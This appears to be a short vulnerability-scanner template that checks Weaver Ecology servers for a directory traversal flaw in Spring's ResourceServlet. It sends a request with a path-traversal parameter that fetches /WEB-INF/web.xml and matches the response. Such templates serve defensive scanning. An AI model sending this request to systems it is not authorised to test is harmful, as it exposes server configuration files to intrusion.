id: ecology-springframework-directory-traversal
info:
  name: Ecology Springframework Directory Traversal
  author: princechaddha
  severity: medium
  tags: ecology,springframework,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
